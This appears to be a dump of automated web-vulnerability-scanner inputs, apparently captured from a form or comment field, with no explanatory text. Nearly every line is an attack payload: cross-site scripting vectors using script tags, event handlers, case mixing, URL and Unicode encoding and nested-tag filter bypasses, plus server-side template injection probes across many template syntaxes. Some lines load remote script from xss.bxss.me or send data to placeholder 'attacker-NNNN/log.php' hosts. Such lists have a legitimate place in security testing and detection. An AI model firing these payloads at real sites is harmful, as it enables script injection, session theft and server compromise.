bfgx5345\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5345

bfgx6557\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6557

555c43Bp <ScRiPt >iegi(9435)</ScRiPt>

dfb{{98991*97996}}xca

555<alSgt9W<

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(9933(9955))}

555reu80 <ScRiPt >70Mz(9803)</ScRiPt>

555<svg  \xa0onload=gceR(9220)

555<WMQUWS>P98XX[!+!]</WMQUWS>

555<svg  \xa0onload=YnxO(9968)

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=gceR(9680)>

555<W9KUBA>FHBLH[!+!]</W9KUBA>

555<WOCBIW>KF1UI[!+!]</WOCBIW>

dfb{98991*97996}xca

555

5556FCnA <ScRiPt >9933(9637)</ScRiPt>

555

555<ifRAme sRc=9295.com></IfRamE>

555<ifRAme sRc=9563.com></IfRamE>

555

555<isindex type=image src=1 onerror=YnxO(9189)>

555<ifRAme sRc=9539.com></IfRamE>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

dfb${98991*97996}xca

555<WSCNNM>QTKIV[!+!]</WSCNNM>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=gceR(9817)>

555<a7X5y8K x=9761>

555<iframe src='data:text/html

555

555<anHOBFT x=9158>

555

555<aqur6S0 x=9454>

555<ifRAme sRc=9010.com></IfRamE>

555<img sRc='http://attacker-9649/log.php?

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9516/log.php?

dfb#{98991*97996}xca

555

555<img sRc='http://attacker-9947/log.php?

555<body onload=YnxO(9556)>

555<img src=//xss.bxss.me/t/dot.gif onload=gceR(9105)>

555<a8OYYUo<

dfb[[${98991*97996}]]xca

555<aI4Iki1<

555<azlnOE8 x=9742>

dfb{#98991*97996}xca

555<aslHwv2<

dfb{{98991*97996}}xca

555

555<img src=//xss.bxss.me/t/dot.gif onload=YnxO(9669)>

555<img src=xyz OnErRor=gceR(9142)>

dfb__${98991*97996}__::.x

dfb{@98991*97996}xca

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

555<img sRc='http://attacker-9145/log.php?

555'"()&%<zzz><ScRiPt >XgpU(9333)</ScRiPt>

555<img/src=">" onerror=alert(9931)>

555<img src=xyz OnErRor=YnxO(9169)>

dfb{{=98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555'"()&%<zzz><ScRiPt >GVwd(9541)</ScRiPt>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb@(98991*97996)xca

'"()&%<zzz><ScRiPt >XgpU(9995)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%67%63%65%52%289241%29%3C%2F%73%43%72%69%70%54%3E

555<a4gb2Hs<

555<ScRiPt >mUeQ(9257)</ScRiPt>

dfb<%=98991*97996%>xca

555<img/src=">" onerror=alert(9572)>

'"()&%<zzz><ScRiPt >GVwd(9140)</ScRiPt>

555\u003CScRiPt\gceR(9029)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%6E%78%4F%289606%29%3C%2F%73%43%72%69%70%54%3E

5559976410

5559662773

dfb__${98991*97996}__::.x

555<WNBPHF>GYCKA[!+!]</WNBPHF>

dfb#set($x=98991*97996)${x}xca

555<ScRiPt >8AFh(9123)</ScRiPt>

bfg8961\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8961

555&lt

555\u003CScRiPt\YnxO(9064)\u003C/sCripT\u003E

555<script>mUeQ(9455)</script>

555<WEQKRY>LHYAG[!+!]</WEQKRY>

555'"()&%<zzz><ScRiPt >Hqvp(9304)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg5053\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5053

dfb{{"abc"|title}}xca

bfgx1387\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1387

\xf6<img zzz onmouseover=gceR(93131) //\xf6>

555<ScRiPt >VtWI(9840)</ScRiPt>

555<script>mUeQ(9784)</script>9784

print("dfb" . 98991*97996 . "xca")

555<script>8AFh(9197)</script>

555<input autofocus onfocus=gceR(9393)>

555'"()&%<zzz><ScRiPt >nkFb(9527)</ScRiPt>

'"()&%<zzz><ScRiPt >Hqvp(9785)</ScRiPt>

bfgx2362\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2362

555&lt

<%={{={@{#{${dfb}}%>

98991*97996*98991*97996

555<WP1OEY>8235X[!+!]</WP1OEY>

555<script>8AFh(9396)</script>9396

\xf6<img zzz onmouseover=YnxO(95561) //\xf6>

<%={{={@{#{${dfb}}%>

555<ScR<ScRiPt>IpT>mUeQ(9258)</sCr<ScRiPt>IpT>

dfb{@math key=98991 method="multiply" operand=97996/}xca

'"()&%<zzz><ScRiPt >nkFb(9676)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

<th:t="${dfb}#foreach

5559517383

555<ScR<ScRiPt>IpT>8AFh(9064)</sCr<ScRiPt>IpT>

555

555<input autofocus onfocus=YnxO(9468)>

555<ScRiPt >mUeQ(9672)</ScRiPt>

5559618319

555<script>VtWI(9114)</script>

dfb{{{this}}}xca

bfg5947\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5947

<th:t="${dfb}#foreach

<a HrEF=jaVaScRiPT:>

555

bfg10560\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10560

#{98991*97996*98991*97996}

555<script>VtWI(9858)</script>9858

bfgx7858\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7858

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >8AFh(9009)</ScRiPt>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9503></ScRiPt>

555<ScR<ScRiPt>IpT>VtWI(9950)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

<%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9331></ScRiPt>

555}body{zzz:Expre/**/SSion(gceR(9395))}

dfb#{xca}=123

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfgx10704\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10704

555

555}body{zzz:Expre/**/SSion(YnxO(9252))}

dfb{{'abcd'.toUpperCase()}}xca

dfb{{98991*97996}}xca

555<ScRiPt >8AFh(9117)</ScRiPt>

555i0Wsk <ScRiPt >gceR(9391)</ScRiPt>

555<ScRiPt >mUeQ(9327)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScRiPt >VtWI(9759)</ScRiPt>

5557L92p <ScRiPt >YnxO(9286)</ScRiPt>

dfb{{98991*97996}}xca

dfb{98991*97996}xca

555<svg  \xa0onload=mUeQ(9108)

555<WHFWQB>ABHBU[!+!]</WHFWQB>

dfb{{98991*97996}}xca

555<svg  \xa0onload=8AFh(9517)

dfb[[${98991*97996}]]xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

dfb{{98991*97996}}xca

555<WSPWQZ>EDNDC[!+!]</WSPWQZ>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9461></ScRiPt>

555<isindex type=image src=1 onerror=8AFh(9922)>

dfb{{98991*97996}}xca

dfb${98991*97996}xca

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=mUeQ(9300)>

555

dfb{98991*97996}xca

555<ifRAme sRc=9344.com></IfRamE>

555<ifRAme sRc=9372.com></IfRamE>

dfb#{98991*97996}xca

555<iframe src='data:text/html

555<a61pk7q x=9184>

555<aOD1BUl x=9482>

555<iframe src='data:text/html

555<ScRiPt >VtWI(9854)</ScRiPt>

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

dfb${98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{#98991*97996}xca

555<img sRc='http://attacker-9218/log.php?

555

555<body onload=mUeQ(9251)>

555<svg  \xa0onload=VtWI(9630)

dfb{@98991*97996}xca

555<body onload=8AFh(9646)>

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=VtWI(9920)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{=98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=mUeQ(9758)>

555<img sRc='http://attacker-9132/log.php?

555<aFDnjiG<

555<ScRiPt >XgpU(9586)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=8AFh(9003)>

dfb#{98991*97996}xca

555<img src=xyz OnErRor=mUeQ(9244)>

555<WNXL3O>ZJEYH[!+!]</WNXL3O>

dfb@(98991*97996)xca

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<iframe src='data:text/html

555<alMJCOg<

555<img/src=">" onerror=alert(9512)>

555<body onload=VtWI(9170)>

dfb{#98991*97996}xca

dfb{{98991*97996}}xca

555<script>XgpU(9275)</script>

dfb<%=98991*97996%>xca

555<ScRiPt >dFsR(9323)</ScRiPt>

555<img src=xyz OnErRor=8AFh(9833)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%55%65%51%289586%29%3C%2F%73%43%72%69%70%54%3E

dfb[[${98991*97996}]]xca

dfb#set($x=98991*97996)${x}xca

555<img src=//xss.bxss.me/t/dot.gif onload=VtWI(9137)>

555<img/src=">" onerror=alert(9395)>

555<script>XgpU(9490)</script>9490

dfb{@98991*97996}xca

555<WAPVGV>UPJRP[!+!]</WAPVGV>

555<img src=xyz OnErRor=VtWI(9289)>

555\u003CScRiPt\mUeQ(9195)\u003C/sCripT\u003E

dfb{{"abc"|title}}xca

dfb__${98991*97996}__::.x

555<script>dFsR(9520)</script>

555<ScR<ScRiPt>IpT>XgpU(9112)</sCr<ScRiPt>IpT>

%35%35%35%3C%53%63%52%69%50%74%20%3E%38%41%46%68%289061%29%3C%2F%73%43%72%69%70%54%3E

555&lt

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

print("dfb" . 98991*97996 . "xca")

dfb{{=98991*97996}}xca

555<img/src=">" onerror=alert(9320)>

555<script>dFsR(9299)</script>9299

555\u003CScRiPt\8AFh(9977)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%56%74%57%49%289570%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >XgpU(9279)</ScRiPt>

98991*97996*98991*97996

dfb@(98991*97996)xca

\xf6<img zzz onmouseover=mUeQ(97771) //\xf6>

555&lt

555<ScRiPt >nkFb(9953)</ScRiPt>

555'"()&%<zzz><ScRiPt >oOYF(9117)</ScRiPt>

555<ScR<ScRiPt>IpT>dFsR(9100)</sCr<ScRiPt>IpT>

555\u003CScRiPt\VtWI(9081)\u003C/sCripT\u003E

555<ScRiPt >dFsR(9430)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9182></ScRiPt>

555&lt

dfb{@math key=98991 method="multiply" operand=97996/}xca

'"()&%<zzz><ScRiPt >oOYF(9557)</ScRiPt>

\xf6<img zzz onmouseover=8AFh(98201) //\xf6>

555<WGAGU4>CF0MH[!+!]</WGAGU4>

555'"()&%<zzz><ScRiPt >dk4Z(9088)</ScRiPt>

555<input autofocus onfocus=mUeQ(9706)>

dfb<%=98991*97996%>xca

555<ScRiPt >XgpU(9318)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9550></ScRiPt>

\xf6<img zzz onmouseover=VtWI(91991) //\xf6>

dfb#set($x=98991*97996)${x}xca

<a HrEF=http://xss.bxss.me></a>

555<script>nkFb(9396)</script>

555<svg  \xa0onload=XgpU(9953)

'"()&%<zzz><ScRiPt >dk4Z(9010)</ScRiPt>

5559166249

dfb{{{this}}}xca

555<ScRiPt >dFsR(9482)</ScRiPt>

555<input autofocus onfocus=8AFh(9075)>

555<input autofocus onfocus=VtWI(9891)>

dfb{{"abc"|title}}xca

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

#{98991*97996*98991*97996}

bfg9756\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9756

555<isindex type=image src=1 onerror=XgpU(9367)>

555<script>nkFb(9233)</script>9233

5559516029

print("dfb" . 98991*97996 . "xca")

<a HrEF=http://xss.bxss.me></a>

555<svg  \xa0onload=dFsR(9314)

555}body{zzz:Expre/**/SSion(mUeQ(9804))}

555<iframe src='data:text/html

dfb#{xca}=123

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555<ScR<ScRiPt>IpT>nkFb(9552)</sCr<ScRiPt>IpT>

555<body onload=XgpU(9137)>

98991*97996*98991*97996

555j2309 <ScRiPt >mUeQ(9365)</ScRiPt>

bfg7076\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7076

555<isindex type=image src=1 onerror=dFsR(9704)>

bfgx7841\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7841

555}body{zzz:Expre/**/SSion(8AFh(9272))}

555<ScRiPt >nkFb(9216)</ScRiPt>

555}body{zzz:Expre/**/SSion(VtWI(9775))}

dfb{{'abcd'.toUpperCase()}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=XgpU(9041)>

555<WUK1FF>JEXM5[!+!]</WUK1FF>

bfgx9494\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9494

<%={{={@{#{${dfb}}%>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9406></ScRiPt>

555<iframe src='data:text/html

555HN2SA <ScRiPt >8AFh(9158)</ScRiPt>

555n4bva <ScRiPt >VtWI(9293)</ScRiPt>

555<ifRAme sRc=9139.com></IfRamE>

dfb{{{this}}}xca

555

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555'"()&%<zzz><ScRiPt >M3G4(9815)</ScRiPt>

555<img src=xyz OnErRor=XgpU(9713)>

555'"()&%<zzz><ScRiPt >Pjcn(9743)</ScRiPt>

555<ScRiPt >nkFb(9903)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<WMNJGV>RBUP9[!+!]</WMNJGV>

555<a6h4xrb x=9646>

555<body onload=dFsR(9831)>

555<WATTFI>ACDFC[!+!]</WATTFI>

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

'"()&%<zzz><ScRiPt >M3G4(9444)</ScRiPt>

'"()&%<zzz><ScRiPt >Pjcn(9736)</ScRiPt>

555<svg  \xa0onload=nkFb(9749)

#{98991*97996*98991*97996}

555

555<ifRAme sRc=9094.com></IfRamE>

555<img sRc='http://attacker-9647/log.php?

555<img/src=">" onerror=alert(9107)>

555<img src=//xss.bxss.me/t/dot.gif onload=dFsR(9518)>

555

555<ifRAme sRc=9559.com></IfRamE>

5559235326

dfb[[${98991*97996}]]xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%58%67%70%55%289473%29%3C%2F%73%43%72%69%70%54%3E

dfb#{xca}=123

555<acuve4D x=9255>

555<aBsGSWK<

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=dFsR(9250)>

bfg6316\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6316

555<isindex type=image src=1 onerror=nkFb(9199)>

<th:t="${dfb}#foreach

5559917450

555<img sRc='http://attacker-9825/log.php?

555<aOpZvMu x=9612>

dfb__${98991*97996}__::.x

555\u003CScRiPt\XgpU(9452)\u003C/sCripT\u003E

555

555

dfb{{'abcd'.toUpperCase()}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9719/log.php?

555<img/src=">" onerror=alert(9235)>

bfgx1182\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1182

555<iframe src='data:text/html

555<aPu4Fqa<

bfg3750\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3750

dfb{{98991*97996}}xca

555<anzSZEc<

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555&lt

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555

%35%35%35%3C%53%63%52%69%50%74%20%3E%64%46%73%52%289615%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=XgpU(92771) //\xf6>

555<body onload=nkFb(9909)>

bfgx1626\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1626

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >TIPw(9786)</ScRiPt>

dfb{{98991*97996}}xca

555'"()&%<zzz><ScRiPt >oewW(9518)</ScRiPt>

555\u003CScRiPt\dFsR(9131)\u003C/sCripT\u003E

555<ScRiPt >GVwd(9654)</ScRiPt>

555<input autofocus onfocus=XgpU(9750)>

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

555

'"()&%<zzz><ScRiPt >TIPw(9321)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=nkFb(9885)>

555&lt

'"()&%<zzz><ScRiPt >oewW(9383)</ScRiPt>

555<WJ9VN0>DEFYT[!+!]</WJ9VN0>

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<th:t="${dfb}#foreach

5559112410

dfb__${98991*97996}__::.x

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=dFsR(90771) //\xf6>

5559309539

555

555<img src=xyz OnErRor=nkFb(9609)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>GVwd(9705)</script>

555<ScRiPt >oOYF(9327)</ScRiPt>

555<img/src=">" onerror=alert(9668)>

555<ScRiPt >Hqvp(9988)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg5759\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5759

bfg2379\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2379

555

555<script>GVwd(9646)</script>9646

555}body{zzz:Expre/**/SSion(XgpU(9341))}

555<input autofocus onfocus=dFsR(9501)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%6B%46%62%289762%29%3C%2F%73%43%72%69%70%54%3E

bfgx5813\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5813

555<WIZ4O5>NCBC0[!+!]</WIZ4O5>

555<WH2Z3W>YVWKF[!+!]</WH2Z3W>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >dk4Z(9900)</ScRiPt>

bfgx8377\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8377

555'"()&%<zzz><ScRiPt >9n5T(9645)</ScRiPt>

555FHAju <ScRiPt >XgpU(9805)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScR<ScRiPt>IpT>GVwd(9508)</sCr<ScRiPt>IpT>

555'"()&%<zzz><ScRiPt >lLKj(9390)</ScRiPt>

555<script>oOYF(9673)</script>

'"()&%<zzz><ScRiPt >9n5T(9084)</ScRiPt>

555<WDWBRW>G3Q8J[!+!]</WDWBRW>

555<script>Hqvp(9748)</script>

555

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\nkFb(9286)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

555<ScRiPt >GVwd(9841)</ScRiPt>

555<script>dk4Z(9021)</script>

'"()&%<zzz><ScRiPt >lLKj(9315)</ScRiPt>

555<script>oOYF(9475)</script>9475

555

555<WYUEXA>PILAW[!+!]</WYUEXA>

555

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<script>Hqvp(9160)</script>9160

5559248680

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9160></ScRiPt>

555<script>dk4Z(9008)</script>9008

555&lt

555

<th:t="${dfb}#foreach

555<ScR<ScRiPt>IpT>oOYF(9752)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

5559721264

555

555<ifRAme sRc=9551.com></IfRamE>

bfg2353\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2353

dfb{{98991*97996}}xca

555<ScRiPt >GVwd(9589)</ScRiPt>

555}body{zzz:Expre/**/SSion(dFsR(9037))}

555<ScRiPt >oOYF(9577)</ScRiPt>

555<ScR<ScRiPt>IpT>Hqvp(9645)</sCr<ScRiPt>IpT>

\xf6<img zzz onmouseover=nkFb(99231) //\xf6>

<th:t="${dfb}#foreach

bfgx8870\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8870

555<aT2lthO x=9766>

555<ScR<ScRiPt>IpT>dk4Z(9138)</sCr<ScRiPt>IpT>

555IFMt0 <ScRiPt >dFsR(9064)</ScRiPt>

bfg8225\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8225

555

dfb[[${98991*97996}]]xca

555<ScRiPt >Hqvp(9459)</ScRiPt>

555<input autofocus onfocus=nkFb(9715)>

555<svg  \xa0onload=GVwd(9851)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9103></ScRiPt>

dfb[[${98991*97996}]]xca

555<W8FUJ0>T3ASN[!+!]</W8FUJ0>

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9670/log.php?

555<ScRiPt >dk4Z(9732)</ScRiPt>

bfgx2573\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2573

<%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=GVwd(9922)>

dfb__${98991*97996}__::.x

555

555

dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9402></ScRiPt>

555<ifRAme sRc=9424.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9104></ScRiPt>

555

555<ScRiPt >oOYF(9473)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<ScRiPt >Hqvp(9182)</ScRiPt>

555<afXvZxA x=9477>

<a HrEF=jaVaScRiPT:>

555<aGO6mev<

dfb{{98991*97996}}xca

555<ScRiPt >dk4Z(9645)</ScRiPt>

555

555<svg  \xa0onload=oOYF(9207)

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<body onload=GVwd(9843)>

<th:t="${dfb}#foreach

555<svg  \xa0onload=Hqvp(9303)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(nkFb(9988))}

dfb[[${98991*97996}]]xca

555

<th:t="${dfb}#foreach

555<isindex type=image src=1 onerror=oOYF(9521)>

555<img sRc='http://attacker-9495/log.php?

555<isindex type=image src=1 onerror=Hqvp(9295)>

555<svg  \xa0onload=dk4Z(9504)

555

555<ScRiPt >M3G4(9680)</ScRiPt>

dfb__${98991*97996}__::.x

555<img src=//xss.bxss.me/t/dot.gif onload=GVwd(9551)>

555<ScRiPt >Pjcn(9163)</ScRiPt>

555<WHCHMU>C7CCZ[!+!]</WHCHMU>

555

555<isindex type=image src=1 onerror=dk4Z(9924)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<aLH9qIh<

555ccJKI <ScRiPt >nkFb(9182)</ScRiPt>

555<iframe src='data:text/html

555

555<body onload=Hqvp(9388)>

555<WUCCDD>JQLQ4[!+!]</WUCCDD>

555<script>M3G4(9098)</script>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=GVwd(9634)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<iframe src='data:text/html

555<body onload=oOYF(9671)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<script>M3G4(9399)</script>9399

555<img/src=">" onerror=alert(9093)>

555<ScRiPt >TIPw(9775)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=Hqvp(9445)>

555<WNSJ3F>6L86A[!+!]</WNSJ3F>

555<body onload=dk4Z(9091)>

555<script>Pjcn(9706)</script>

555<ScR<ScRiPt>IpT>M3G4(9281)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=Hqvp(9712)>

dfb[[${98991*97996}]]xca

555

555<WZ9RMQ>OW0H2[!+!]</WZ9RMQ>

555<img src=//xss.bxss.me/t/dot.gif onload=oOYF(9128)>

555<img src=//xss.bxss.me/t/dot.gif onload=dk4Z(9324)>

555<img/src=">" onerror=alert(9145)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%56%77%64%289645%29%3C%2F%73%43%72%69%70%54%3E

555<script>Pjcn(9939)</script>9939

555<img src=xyz OnErRor=oOYF(9678)>

555<img src=xyz OnErRor=dk4Z(9495)>

dfb[[${98991*97996}]]xca

555<ScRiPt >M3G4(9164)</ScRiPt>

dfb{{98991*97996}}xca

555<ScR<ScRiPt>IpT>Pjcn(9283)</sCr<ScRiPt>IpT>

555<script>TIPw(9377)</script>

%35%35%35%3C%53%63%52%69%50%74%20%3E%48%71%76%70%289317%29%3C%2F%73%43%72%69%70%54%3E

dfb__${98991*97996}__::.x

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9193></ScRiPt>

dfb[[${98991*97996}]]xca

555\u003CScRiPt\GVwd(9648)\u003C/sCripT\u003E

555<script>TIPw(9808)</script>9808

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img/src=">" onerror=alert(9326)>

555<img/src=">" onerror=alert(9245)>

dfb__${98991*97996}__::.x

555\u003CScRiPt\Hqvp(9901)\u003C/sCripT\u003E

555<ScRiPt >Pjcn(9659)</ScRiPt>

555<ScRiPt >M3G4(9847)</ScRiPt>

555&lt

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9311></ScRiPt>

555&lt

\xf6<img zzz onmouseover=GVwd(92181) //\xf6>

555<svg  \xa0onload=M3G4(9484)

dfb__${98991*97996}__::.x

%35%35%35%3C%53%63%52%69%50%74%20%3E%64%6B%34%5A%289084%29%3C%2F%73%43%72%69%70%54%3E

555<ScR<ScRiPt>IpT>TIPw(9883)</sCr<ScRiPt>IpT>

\xf6<img zzz onmouseover=Hqvp(99721) //\xf6>

555<ScRiPt >Pjcn(9033)</ScRiPt>

555<ScRiPt >oewW(9585)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%4F%59%46%289019%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=M3G4(9906)>

555\u003CScRiPt\dk4Z(9407)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >TIPw(9187)</ScRiPt>

555<svg  \xa0onload=Pjcn(9004)

555<WF1GG2>TIUMR[!+!]</WF1GG2>

555<input autofocus onfocus=GVwd(9373)>

555<ScRiPt >9n5T(9705)</ScRiPt>

555&lt

555<input autofocus onfocus=Hqvp(9108)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9462></ScRiPt>

555\u003CScRiPt\oOYF(9620)\u003C/sCripT\u003E

555<iframe src='data:text/html

555<ScRiPt >lLKj(9848)</ScRiPt>

555<WTZYPY>K4NEA[!+!]</WTZYPY>

555<isindex type=image src=1 onerror=Pjcn(9630)>

\xf6<img zzz onmouseover=dk4Z(99661) //\xf6>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >TIPw(9752)</ScRiPt>

555<script>oewW(9200)</script>

555'"()&%<zzz><ScRiPt >jNoP(9555)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<WVUFL0>WLEMJ[!+!]</WVUFL0>

555&lt

555<svg  \xa0onload=TIPw(9573)

555<script>oewW(9181)</script>9181

555<iframe src='data:text/html

555<body onload=M3G4(9767)>

555<script>9n5T(9335)</script>

555<input autofocus onfocus=dk4Z(9550)>

555'"()&%<zzz><ScRiPt >9G0z(9305)</ScRiPt>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555<body onload=Pjcn(9071)>

555<script>lLKj(9016)</script>

'"()&%<zzz><ScRiPt >jNoP(9607)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<isindex type=image src=1 onerror=TIPw(9538)>

555}body{zzz:Expre/**/SSion(GVwd(9792))}

555<script>9n5T(9591)</script>9591

555<img src=//xss.bxss.me/t/dot.gif onload=Pjcn(9431)>

555<script>lLKj(9389)</script>9389

555}body{zzz:Expre/**/SSion(Hqvp(9650))}

555<img src=//xss.bxss.me/t/dot.gif onload=M3G4(9581)>

\xf6<img zzz onmouseover=oOYF(98371) //\xf6>

555<ScR<ScRiPt>IpT>oewW(9832)</sCr<ScRiPt>IpT>

'"()&%<zzz><ScRiPt >9G0z(9842)</ScRiPt>

5559759208

<a HrEF=jaVaScRiPT:>

555<iframe src='data:text/html

555<ScRiPt >oewW(9169)</ScRiPt>

5559943662

